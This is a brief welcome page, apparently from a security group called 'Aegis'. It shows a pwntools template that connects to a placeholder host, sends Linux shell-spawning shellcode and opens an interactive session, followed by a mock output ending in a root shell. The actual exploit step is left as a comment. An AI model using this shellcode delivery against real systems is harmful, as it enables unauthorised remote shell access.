Welcome Aegis

Hello Aegis Users!

We Are Aegis!

from pwn import *
context(arch = 'i386', os = 'linux')

r = remote('exploitme.example.com', 31337)
# EXPLOIT CODE GOES HERE
r.send(asm(shellcraft.sh()))
r.interactive()
$ python3 exploit.py 
$ [+] connect to victim host...
$ [+] launch exploit code...
$ [+] Successfully! Get Shell!
# whoami 
root

Welcome Aegis
Scroll to top